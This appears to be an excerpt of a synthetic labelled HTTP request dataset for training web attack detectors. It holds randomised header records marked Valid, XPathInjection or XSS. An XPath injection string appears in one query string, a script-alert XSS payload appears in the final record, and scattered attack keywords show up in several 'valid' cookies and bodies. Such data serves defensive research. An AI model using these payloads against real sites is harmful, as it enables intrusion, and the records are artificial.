From: 7beimH@indn.it
If-Modified-Since: Fri, 18 Nov 05 05:48:06 UTC
If-Unmodified-Since: Sat, 17 Jul 04 06:43:21 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 02 Jun 05 10:34:27 UTC
Max-Forwards: 974
MIME-Version: 3.7
Pragma: Eirtnine='el7o5r'
Proxy-Authorization: Basic b2xtdDpuZHdu
Authorization: hmsefL a2irb=ahntosr
Range: -085,-96748
Referer: /G2dudeil/ehos/ihyeeeyr.txt
TE: deflate,chunked;q=0.5,trailers
Trailer: Warning
User-Agent: 2jsiucdee (n2KdLWWH; hClWCTGt; 69ffa8ygDq; tJFTT5-iD; eR@_0qC)
UA-CPU: x86
UA-Disp: 950,9201,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5729x0287
Via: 3.0 138.14.121.128:2, 8.8 121.148.94.96, 1.1 www.tn6hp.jpeg
Transfer-Encoding: compress
Upgrade: n3amhi/4.3, hx6It8/3.4, tcc1Ue/2.8
Warning: 890 www.nUiou.jpeg "oe52aLer" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6793102
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16648
Start - Id: 2692
class: Valid
GET /Yja/rIm.exe?KWGw0qnodeuu2U=Irmlanneea&nu=dD%40MmEk HTTP/1.1
Host: www.srca2.it
Connection: close
Accept: application/x-tar;q=0.9, video/quicktime;q=0.2, audio/*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.3, identity, identity
Accept-Language: *
Cache-Control: T='49'
Client-ip: 55.62.233.42
Cookie: 7saI=wsp1rdxef;h1isnbhlnuheeo=cnt b:hcapz$ ;iwJVboot.inid.ortdropexecs=Aqgjnpsar<
Cookie2: $Version="345"
Date: Wed, 18 Feb 04 20:26:49 CET
ETag: W/"Z@xz2aRztfnt6dQ"
Expect: 100-continue
From: Dhellnoh@bmtei.net
If-Modified-Since: Sun, 20 Apr 08 05:58:14 CET
If-Unmodified-Since: Wed, 22 Oct 08 14:14:12 CET
If-Match: *
If-None-Match: "zSSHZ3UhX1ZiTKpT"
If-Range: Tue, 20 Jul 04 12:37:05 GMT
Max-Forwards: 1
MIME-Version: 9.3
Pragma: to='yiyey'
Proxy-Authorization: Basic MUVsdDoxb3NlY29mZQ==
Authorization: Digest nonce
Range: 652-
Referer: http://www.sLsEntsc.com/eKnynsn/rufdos.dll
TE: trailers,deflate;q=0.0,trailers
Trailer: Host
User-Agent: Mozilla/8.7 (compatible; MSIE 8.5; Linux i386; odrdrie; gsteiejhT)
UA-CPU: MIPS
UA-Disp: 6089,3163,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 486x934
Via: HTTP/9.5 www.edFnj.js, 8.1 108.8.151.108
Transfer-Encoding: deflate
Upgrade: azkuh/4.3, ztter/5.6, EyResi/1.5, vTvy/8.8
Warning: 219 122.35.37.173 "2adtsiylpah6Tny" "Sun, 23 Oct 05 22:41:41 GMT"
X-Forwarded-For: 67.16.171.178
X-Serial-Number: 8136074594585
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2692
Start - Id: 35742
class: XPathInjection
GET /tdeh4/eJpF/te8oleuviaiFHahiaduf.pl?vheeehtt=7526594&seSngeye=ahtrr%2Fejru%2Fsmdd%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D0%5D+++or++++%2722m%27%3D+%27&ttciT=59692731&iemles=hyst6&ko=hfospvlrsrd&ArcniOosrtI=tL&gBdakeuhierm=nnxG3JKH&teEsqd=ias+&BaWdm=o&5PlsfKnob9h=areuNDwAeo3&ita1hedNioea7t=l%40GUP53ee&_PNADLZoRiq=tetmstdin&0yaao=ritah&iSagRnEca4wg=0815 HTTP/1.1
Host: www.haocae.ch:737
Connection: 5uoekiga
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, deflate;q=0.5
Accept-Language: bao7Ee-r, As-ii
Cache-Control: h1ftsoi='vsEas'
Client-ip: 249.225.215.155
Cookie: saedRr2a=076757287;n7tatbycIetninr=9135610851;YOi79YWfkxnull=mpnnaobomochaetgroup bye31
Cookie2: $Version="4"
Date: Sun, 22 Oct 06 07:10:05 UTC
ETag: "UQRCXM-rpuSyTChl2N"
Expect: 100-continue
From: 7mrzro1@lUne0jie.it
If-Modified-Since: Wed, 24 Jan 07 14:49:37 CET
If-Unmodified-Since: Tue, 06 Jul 04 17:21:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 662
MIME-Version: 5.0
Pragma: eild=oOcba
Proxy-Authorization: lbae ji6pSct=zng4myt
Authorization: Digest nonce
Range: 820401-
Referer: /o2vb/lqa0lxaw/wat9e/WxsewhkY.tiff
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/0.0 (X11; U; Solaris 2.5; oe-bo; rv:3.1.7) Gecko/01118985
UA-CPU: x86
UA-Disp: 453,3007,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: ds6/8.7 www.Agwesee.png:56823
Transfer-Encoding: erVai1; acTte7lz=n3ys
Upgrade: Toa/4.1
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 7969287836637200
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35742
Start - Id: 6881
class: Valid
POST /e4de/mqVerP/iuq1cir6sWostponttep/1uh6c8sreEwrgInzj/aMpeBv1dJ5xT/icbfMSi.q/re1tRdYZddepriiene/eQs8wyCsmqpe/taANaliMnaej9d0Nst/reziai.css? HTTP/1.0
Content-Length: 32
Content-Language: wsf7ilS,MwRdea,clrsn
Content-Encoding: identity
Content-Location: http://www.Seto.gov/ebxr9i.png
Content-MD5: ZXAxb2R0V2VlYWVldEkxYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Apr 09 03:36:01 GMT
Last-Modified: Wed, 13 Jul 05 23:54:42 CET
Host: 188.71.231.46
Connection: onri
Accept: text/*, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: hodesdrh-rq, olsijtta-oexd
Cache-Control: no-cache
Client-ip: 118.109.182.100
Cookie: la=343357;hsnimtax=er6iaq
Cookie2: $Version="0"
Date: Mon, 29 Sep 08 06:05:13 GMT
ETag: "AR_t4pvKsG9QSCYlj"
Expect: 100-continue
From: 1m1ll@ibidpns.org
If-Modified-Since: Fri, 05 Jun 09 04:53:50 GMT
If-Unmodified-Since: Tue, 13 Jun 06 21:53:55 UTC
If-Match: "zg6GpZ@VPXgLdTr"
If-None-Match: "Ld6F7E4WT8UwP6zBR3W"
If-Range: "qWjX3XzBU_B_TFqdF"
Max-Forwards: 1448
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://nsa5.net/jIlhTi.rar
Authorization: Digest nonce
Range: -93,35-
Referer: http://oHayhe.st/Lfbe/eidhdnr/djeeClxw/olugm/fUzei8e.asp
TE: trailers,trailers,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: s1vddv http://www.4reeuda.net
UA-CPU: x86
UA-Disp: 7188,784,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 496x5279
Via: FTP/6.2 80.53.61.252:44, FTP/7.8 www.oat2.js
Transfer-Encoding: compress
Upgrade: pePaai/6.4, heot/7.3
Warning: 207 www.7yee.shtml "rotcrNusEy3ganeoytl" "Mon, 04 Feb 08 07:34:03 GMT"
X-Forwarded-For: 230.208.82.135
X-Serial-Number: 65434343667649
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

aAGh=7083&ormeoqmeut=Amochah:g

End - Id: 6881
Start - Id: 14031
class: Valid
GET /w1.R_YvRv@RNGq@2zf/LTJL-J-evalEbDb17.cfm?ie2an=594 HTTP/1.1
Host: www.uan1eiC.com
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-1252, euc-kr, iso-8859-6;q=0.3, utf-8, iso-8859-6;q=0.9
Accept-Encoding: identity;q=0.1, gzip;q=0.7, gzip;q=0.8, compress;q=0.0
Accept-Language: earccaea-nctiee8;q=0.3, ne7hbeie-mtso;q=0.7, fnrl-sEdh;q=0.7, woetsmng-see9c, e1wea-O39uw
Cache-Control: no-transform
Client-ip: 198.31.127.58
Cookie: eusdaarht=ar
Cookie2: $Version="19"
Date: Sat, 13 May 06 07:32:38 UTC
ETag: "BL8IO2.W.cvsQdvjJOWQ"
Expect: bserz0
From: aeeaqe@ea10ef.st
If-Modified-Since: Tue, 26 Oct 04 14:54:09 CET
If-Unmodified-Since: Wed, 31 Mar 04 06:52:35 CET
If-Match: *
If-None-Match: "@xjAXGNOyoNjSrU"
If-Range: Fri, 24 Jun 05 21:34:12 GMT
Max-Forwards: 3
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic YXZlMzU6aTJtdTVlUmk=
Authorization: Basic cm9ybDpFbUhJdGVl
Range: 8-,94-,2766-
Referer: /Itnhmbln.swf
TE: deflate,gzip;q=0.4
Trailer: Date
User-Agent: apq8AND http://www.cTch.it
UA-CPU: MIPS
UA-Disp: 7781,2537,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8443x481
Via: HTTP/1.5 www.ngnsi5es.js, HTTP/2.8 92.143.67.166, HTTP/9.8 177.127.12.213:72
Transfer-Encoding: gzip
Upgrade: iQr/6.2
Warning: 285 12.210.81.67 "VnnPEeqt6bdltiru" 
X-Forwarded-For: 70.126.200.109
X-Serial-Number: 0043438224132828242
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14031
Start - Id: 3511
class: Valid
GET /ta7nmsEi/exEABkS04UZwfTdf/RxtwnhekXroWet/egles9irheodge9st/ed2YzJAtTzx3UFee/catYcathWJxp_/1GHJG-e7fQy3jjqX/i.FohmucWWzYq-h/C6O/edpaMtphIAcjiiuaAe/fI4ziQx.html?NtekcsowFAc=%27&EvrhdcsuSft7ic=dpcuerjOojtslr&nAtNmei39e=3&fyV5=rNEg&ExtermTjUKBOLO=itefXe&9oePe=4540429&no7dsvz=h+sss&shptkeaau=EbeexecQT&9ehomdEntnrc8=h9wisen%3Aul&22iKdropFQGFKWW=izapZsW&ZdocumentXDp=rln%24ayclogboot.iniaoe&7nesscfFyoot7y=2180&spe=ir70nn5demmer&oenalekeoe=an4siIae4tkAbniena HTTP/1.1
Host: www.g7arp3uha.net
Connection: hveszyo
Accept: audio/x-wav;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.3, compress;q=0.5, compress, deflate;q=0.1
Accept-Language: attahdt-idcd;q=0.7, cl-m;q=0.9, s-eROk;q=0.0
Cache-Control: no-transform
Client-ip: 61.50.151.28
Cookie: ajneanj=[etct;sogR1licsei=n81;xdeb=50371343;soGhnsaRlw=7;ue0=labXMR
Cookie2: $Version="02"
Date: Sat, 11 Aug 07 07:42:07 GMT
ETag: W/"Ydq2Pm754hX4E3m"
Expect: bnler4g=a9nou
From: 4qmTaq3m@xens.uk
If-Modified-Since: Mon, 26 Oct 09 10:27:36 CET
If-Unmodified-Since: Sun, 15 Feb 04 01:11:05 GMT
If-Match: "GO8VNGPbP-CZdXAzBeMC"
If-None-Match: *
If-Range: Sat, 27 Sep 08 07:02:29 CET
Max-Forwards: 3264
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM eXNhcGFJMmxyMGk3TnV2aWl1b3A3dGFndHZmYWllZGNpc25wb2w=
Authorization: Basic ZWhocjp0bElw
Range: -30400,-8
Referer: http://tsrveso.st/IEeoIegd.jpeg
TE: trailers
Trailer: Connection
User-Agent: Mozilla/4.0 (X11; U; Linux i586 3.0; xy-su; rv:0.7.6) Gecko/36241585
UA-CPU: StrongARM
UA-Disp: 845,505,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3900x7810
Via: 1.1 www.Mfosrr.tiff, FTP/1.9 www.stargeri.png, 4.5 www.nont.shtml
Transfer-Encoding: identity
Upgrade: inat/2.9, rRci/3.1
Warning: 091 199.68.197.103 "tasntac2pontmt" "Sat, 20 Oct 07 17:48:51 GMT"
X-Forwarded-For: 36.213.69.49
X-Serial-Number: 8528165138107530
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3511
Start - Id: 15862
class: Valid
GET /iaonHc3bng/dtantthev3erhtmr/actFU1K2UngRBj6Sa/TyZ@H4S.swf?KV4HoiNoC@57=8&e3=bselectrbetweeninclude+Tsoagaewselectto&opetoeVIi=rf HTTP/1.1
Host: 154.228.15.236
Connection: H4dw
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: Fb=hNe
Client-ip: 127.204.91.129
Cookie: ysofasiJurei=ahxEB
Cookie2: $Version="0"
Date: Mon, 13 Feb 06 08:26:43 GMT
ETag: W/"RMcT4tkLPvog1osWLHoI"
Expect: 100-continue
From: ddet@hbn6tgsa.be
If-Modified-Since: Mon, 01 Oct 07 16:15:30 GMT
If-Unmodified-Since: Sat, 13 Dec 08 11:47:04 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 06 Dec 07 04:20:27 UTC
Max-Forwards: 7918
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic bWRydTp4ZWRtb25n
Authorization: Digest opaque="snn4n"
Range: 33-,177768-
Referer: /T0o1o1f.nsf
TE: trailers,trailers
Trailer: Warning
User-Agent: t9xl/4.9.6
UA-CPU: MIPS
UA-Disp: 318,100,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7576x5405
Via: 7.8 www.r6nm4rb.html, 3.3 www.rbtp.jpeg, 1.9 140.78.245.54
Transfer-Encoding: compress
Upgrade: ae5a/2.7, top/0.4, ml19a/6.1, llc/5.5, otta/2.3
Warning: 000 242.230.25.115 "eTsTilafemtebeae" "Sat, 31 Oct 09 19:10:50 CET"
X-Forwarded-For: 27.123.98.19
X-Serial-Number: 11033805960306619864
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15862
Start - Id: 18850
class: Valid
GET /t2ntq04ieoi/k-q4_e.rHLO/eFgmEepSYE6Nkf.yM.js? HTTP/1.1
Host: www.see731Atai.com
Connection: close
Accept: video/*;q=0.4, application/*;q=0.8, audio/*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: ttnemah-e79et, e-ntna;q=0.2, aiOms-itnhatee, sehiAt-1m2zta
Cache-Control: no-cache
Client-ip: 228.55.43.33
Cookie: fEondt2=558786966;Hhtewsdnaawe=3955849;pirs0ooput=6;dceN3s=eyn7llfhbhlect;ehauo=yZlegt
Cookie2: $Version="1"
Date: Sat, 14 Apr 07 07:09:13 CET
ETag: "Y@rExN4rE4Iovx2vndI"
Expect: 2o6be6fd
From: oiir0@raaeopgcl.it
If-Modified-Since: Tue, 29 Dec 09 17:47:53 GMT
If-Unmodified-Since: Sun, 20 May 07 21:27:24 CET
If-Match: "_p8VCZahGY_LjaGeMx"
If-None-Match: *
If-Range: Sat, 12 Feb 05 05:47:03 GMT
Max-Forwards: 9199
MIME-Version: 1.1
Pragma: rDLmyTio='ouamo'
Proxy-Authorization: jniene rlc0of=edatai
Authorization: Basic ZW5jMXo6UmVNdGU=
Range: -4
Referer: /enoA/nyjfyaO/hislon/thO8E.exe
TE: trailers,trailers
Trailer: Range
User-Agent: ehHosoit77nyyh
UA-CPU: MIPS
UA-Disp: 8023,7803,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 928x9572
Via: 8duoi/5.1 www.bnt6on.js, 3.1 76.159.116.49:86, HTTP/1.1 77.245.171.198:73
Transfer-Encoding: compress
Upgrade: hhse/5.8, OOtIlr/6.6, swie/9.3, mroc/7.7, taRta/6.4
Warning: 911 www.mclwl.shtml "mteatliekhoncjtInek" "Tue, 16 Jan 07 20:18:18 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 8138044161
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18850
Start - Id: 8186
class: Valid
GET /81Klink.php3? HTTP/1.0
Host: www.sadrSnds.be
Connection: close
Accept: application/rtf;q=0.7
Accept-Charset: x-mac-cyrillic;q=0.7, x-mac-hebrew, iso-8859-9;q=0.0, windows-1250;q=0.8
Accept-Encoding: compress, gzip;q=0.2, deflate, deflate;q=0.9
Accept-Language: hni-ttcabi0n, uiho-un;q=0.5, i-schpratt;q=0.8, tleuy-m
Cache-Control: no-store
Client-ip: 110.38.97.95
Cookie: asm=eeh53tynunbemilLu;dnla=shutdown rme3locationdXli;almetrheuoex=Anauado&;4tIrLvme=am3;v5hVTYeAh-uT=d>nieIiti;PpasswdVR6=shx1
Cookie2: $Version="689"
Date: Sat, 03 Apr 10 18:49:52 UTC
ETag: "CJ2FHvY_yVxe4mme"
Expect: cah1n=aakpb9;omly
From: lncsrs1@ssri.net
If-Modified-Since: Wed, 25 Jul 07 16:34:11 CET
If-Unmodified-Since: Wed, 23 Aug 06 10:25:02 CET
If-Match: *
If-None-Match: ".4HTh9fWUvSL@0x."
If-Range: "b8GLjyVIWsFJCdO59"
Max-Forwards: 416
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic cW5kcm5pOmdzaWFn
Authorization: Digest opaque="ieailsa"
Range: -635
Referer: /htffN/O8mkdl/b8sns.pl
TE: deflate;q=0.1,trailers
Trailer: If-Range
User-Agent: Mozilla/2.0 (Machintosh; U; Mac OS X 9.4; ee-bd; rv:5.4.3) Gecko/44567756
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1852x378
Via: 7.0 www.gmehjlol.jpg
Transfer-Encoding: identity
Upgrade: epnli/5.9
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 143.171.199.183
X-Serial-Number: 81045574594520616
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8186
Start - Id: 7294
class: Valid
POST /jfMGAf_71yW/fwntgOTXeyuDcpeiP/yds/Ijb@T5-oftp/a3.p.jpg? HTTP/1.0
Content-Length: 132
Content-Language: i1e,a,9sasSleH
Content-Encoding: compress
Content-Location: http://neVi.fr/ttynrsc0/rno2/5thipa/ioatn.tar
Content-MD5: a3NpYmE0bmVlZ2hiOTJhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Dec 04 01:19:15 CET
Last-Modified: Mon, 13 Apr 09 19:37:18 CET
Host: www.itnseeg.biz
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: utf-8, iso-8859-2, koi8
Accept-Encoding: *
Accept-Language: nu-htx, Enibou-Esdx;q=0.6, bntola-eDYobeB;q=0.2, Twxc-sw
Cache-Control: max-stale
Client-ip: 128.222.186.103
Cookie: 97ehn2Ah=e6ecy1nvpoha
Cookie2: $Version="943"
Date: Sun, 20 Jul 08 22:34:05 GMT
ETag: W/"O2.fwxGJRPo.ZQcDd@3"
Expect: eOomxsnh=fautnd;TnFoe
From: unwtaXtu@IqrpdtE.de
If-Modified-Since: Wed, 11 Feb 04 05:43:26 UTC
If-Unmodified-Since: Thu, 17 Apr 08 15:47:05 UTC
If-Match: "xMiaXp6kLjOqmon"
If-None-Match: *
If-Range: *
Max-Forwards: 089
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic ZmVlaWU2Yjo0dGxy
Authorization: Basic YmI3aVI2OmZjSGprdA==
Range: -226356
Referer: http://lyET.fr/sactd/yn2gApo/dDafvtnl/inoanopf/vlmay.sh
TE: trailers,chunked;q=0.7
Trailer: Trailer
User-Agent: ifrenrr60yhortao
UA-CPU: 68000
UA-Disp: 6402,121,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1302x7380
Via: fnheo/8.1 194.209.154.12, wyTrv/5.9 www.s6rs.tiff
Transfer-Encoding: ohjto
Upgrade: at1unn/1.6, Eep/3.6
Warning: 021 www.OTNintec.htm:54 "iofmfce1od" "Sat, 12 Mar 05 11:41:31 UTC"
X-Forwarded-For: 145.201.167.246
X-Serial-Number: 35067124458
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

ui=asxh&hdefeoeu=geef=acnMexhT&bVL3A=fypassthru&qNSyN9passwdexecWQj=ltdeotmm+sntt&ybnett2Psehh=566699&aptC=d3G5&htwlehgeNly7=xfo

End - Id: 7294
Start - Id: 15378
class: Valid
GET /tGN/qCcqcPEt06DTCLR/7d7.a52NWhrbe/e0HNyxQHuLWAuR4n9D7/ME8zoM2between0aobject5A6/osBgnTASYBGbLjuCPt/Dnh/osBZTE19M/a5zX5yZ63WHT_b1.mspx?5NNsQPH=huwntmIe&htawO3tu=9&9t5wdbtUhoh=i48%40i%5Caomh%3D+nepszbtx&aahwhui6soycooc=0%3Cqtoasts9n%3F&LHJK8ns=Daacceptnii&m9eun=uah&edoig=l3&ti9hroi8iEahor2=I%5Df&a4eiiuimiana=Qndsaztthiy&8atz=8&beessarnere=1 HTTP/1.1
Host: www.ozja.com
Connection: close
Accept: */*
Accept-Charset: euc-kr;q=0.6, us-ascii;q=0.4, isiri-3342
Accept-Encoding: *
Accept-Language: tuna-Eh;q=0.0, tua-mer, owtw6-eNn;q=0.5
Cache-Control: max-stale=7
Client-ip: 63.112.220.104
Cookie: 9binDjD2=nLp9q.s;rtai=document\1;tearbxhHi=9999540002;ehufifeWTtll=te
Cookie2: $Version="5"
Date: Sun, 22 Nov 09 05:28:07 UTC
ETag: W/"K32uOEH0nFv5TDh"
Expect: o6arfhht=Mcornn;iUcnwb
From: geinl@l3cifnrd43.fr
If-Modified-Since: Fri, 16 Nov 07 17:48:24 GMT
If-Unmodified-Since: Fri, 31 Mar 06 23:17:36 UTC
If-Match: "ngjb@udgoWY9EXYUIUPa"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: l7kr5 aism8h=ekiama5a
Authorization: Digest uri=/vaeeyin/svnooe45/tlbm.php4
Range: 41-,07174-
Referer: http://www.qdaaH.org/iy8oedue/aOlViati/n1dwae/5uoqeato.asp
TE: gzip,deflate;q=0.4,trailers
Trailer: User-Agent
User-Agent: oTjAeenSje/4.9
UA-CPU: x86
UA-Disp: 4712,7583,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5103x7782
Via: 7.0 235.114.83.194, 6.3 www.5sdli.tiff
Transfer-Encoding: compress
Upgrade: o0onr/9.5
Warning: 110 199.172.130.251 "3ahnwUsse4t" "Tue, 14 Jun 05 17:49:50 GMT"
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15378
Start - Id: 10281
class: Valid
GET /eer/ebLIUIyR6ks_2/96_mGIMvZ8MREki0UT/Yall/so/o8TG2aWV/he1.aspx?oas=49865&IcifrwdSouttl=9890&rMocs8tlteien=3CLK_eOnpx&cubhroIItswsg=0t&5ty=1&fim8ce=v5nen9tebwl&rmoc=i&sk6mfsw=%2Bkttc%5CFi&hmmnoPsEt42pl=7532989&xugrnYmshacCnn6=hl7NJF4AES&.link@o=aj&eL=ehuhcogg12t1 HTTP/1.1
Host: 223.51.201.201:8421
Connection: keep-alive
Accept: video/mpeg;q=0.5, audio/basic;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: m6t-b;q=0.8, tr-Uj;q=0.2
Cache-Control: no-cache
Client-ip: 197.186.92.237
Cookie: GNu-OmA=ttgFNieprut4ta;scriptRpfrX=esrh0eeeiiojt;edtrzi=244679;4Tlteeu6hnye=288;etmnthtoc=rV8VdgBsMc;bm=47823120
Cookie2: $Version="28"
Date: Wed, 21 Nov 07 06:06:19 UTC
ETag: "WTK0GJVSrEi69QUKnrnU"
Expect: 100-continue
From: yeiwtd@pnstn5nxr.com
If-Modified-Since: Mon, 19 Nov 07 08:11:01 GMT
If-Unmodified-Since: Sat, 03 Jan 09 17:57:22 CET
If-Match: *
If-None-Match: "sKdFtGH2EA5gfkcN"
If-Range: *
Max-Forwards: 9400
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="et2etr"
Authorization: Digest opaque="aErocc0"
Range: 12-5596
Referer: http://ldh6ovI.st/mzapaTt/au9kE/yhmno/taotue/hlgls.sh
TE: deflate
Trailer: If-Range
User-Agent: Mozilla/5.2 (Machintosh; U; Mac OS X 4.8; sp-Ep; rv:0.6.2) Gecko/37030439
UA-CPU: StrongARM
UA-Disp: 118,0565,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 032x7737
Via: wwi7nt/3.8 www.E1sir.css
Transfer-Encoding: ag3tk0
Upgrade: lxaa/1.4, oOw/0.1, hlr5e/7.5
Warning: 290 127.109.243.103:50 "mdeglz4ees" "Sat, 11 Nov 06 08:59:06 UTC"
X-Forwarded-For: 205.147.122.108
X-Serial-Number: 2161344107143
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 10281
Start - Id: 31896
class: Valid
GET /wOtTnS-4LInph-/2xH1jdc4yp@EBj.k/RNq9-Qnodeb.dll?itx1p=tl2l3hn8+uAt&dc=oafkp%27eO&sseglvi=3688922&OceubtesBuy=gfoLV5OS&ohtorouR=9093&oim0=ooTCKx._3&C7oxw=rB2Hluy&E_XG-K=vgpbHLTK HTTP/1.1
Host: www.fjux.gov
Connection: keep-alive
Accept: audio/*;q=0.0, text/html
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: 2ub2ege-ozsq;q=0.6, 7rNiyro-1, n7ooa-yshny, kwiqus7t-kduk;q=0.5, shlesa8h-Ohvl1d
Cache-Control: max-age=056
Client-ip: 96.2.136.62
Cookie: PnsnawNanNce=asanrnaaylidTs3;detEte=tanbtoe4m3drhNel
Cookie2: $Version="03"
Date: Tue, 27 Dec 05 16:53:36 CET
ETag: W/"ZZYY7JoP4x.Y.wset"
Expect: ziuMb6
From: blt2@eee1eeNa.st
If-Modified-Since: Sun, 16 Apr 06 19:43:14 CET
If-Unmodified-Since: Tue, 16 Aug 05 02:27:29 UTC
If-Match: *
If-None-Match: "GxFf.oKRyLYCSdKM"
If-Range: *
Max-Forwards: 19
MIME-Version: 2.4
Pragma: h='h'
Proxy-Authorization: Digest algorithm=Eaeos
Authorization: Basic ZWVzb2FyOnJsbDBv
Range: 581-,06-0,27-
Referer: /piYnW/tyohnavT/a7mod1Q.txt
TE: deflate,trailers,trailers
Trailer: Expect
User-Agent: iap6oa/8.0.1.1
UA-CPU: StrongARM
UA-Disp: 280,3333,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 154x250
Via: 2.2 207.110.232.242
Transfer-Encoding: compress
Upgrade: znl/9.4, enhOao/1.7, esna/5.0
Warning: 978 44.130.75.56 "tySnc" 
X-Forwarded-For: 66.190.156.36
X-Serial-Number: 812398
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31896
Start - Id: 47049
class: XSS
GET /rgAMFrPReo-IyddR5r/nPa0VdxpFBb-i7H/nritHeeunrAt1tea/ryLaesnA0vw5a/seGfp.html?ecPal=aslogSu&kdrni=tr%3Eia&eian0jL=%26%3Cscript+%3E%5Balert++%28%27rotdapb%27%29%3B%5D%3C%2Fscript%3E&phaeoAmiaerrte=tet1&L2e=0392&fr63eestgyalaht=e&ueo=ih6eeYpgmTt1le&anInloahn=rHIno99hvN1&hlehs=38iota0dfrom+mx6Eeo0&h4abt4=94193488 HTTP/1.0
Host: 15.142.133.88:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: cp-950, x-mac-korean, cp-932
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 67.25.41.239
Cookie: adtoiepostWr=u9dhnnae;Itsge=%\;dgmiDiee=l-miHwujVBe;Onstn=46;xA=9399
Cookie2: $Version="33"
Date: Thu, 31 Jan 08 10:26:31 CET
ETag: "xAjLDL6y7lpFf1FZDT"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Sat, 16 Jan 10 13:50:59 UTC
If-Unmodified-Since: Wed, 18 Oct 06 05:43:36 UTC
If-Match: "hr925sZF2fbN0riJ"
If-None-Match: *
If-Range: *
Max-Forwards: 224
MIME-Version: 1.7
Pragma: emedlm='o5mawtn'
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest response="8745DFa2b418762cEBbecDFf1fC62878"
Range: 388869-790680,430-,-04157
Referer: /tinstH/zol0/8ensrhj.php3
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.4 (Windows; U; Win98 3.1; ld-lp; rv:2.1.6) Gecko/43626206
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 987x1282
Via: 3.1 130.185.200.45, 8.4 www.y1ssws.htm, 4.9 107.177.178.240
Transfer-Encoding: deflate
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 325 www.hiofaai.jpg "t4eneszdrtoed" "Mon, 26 Jul 04 01:19:48 CET"
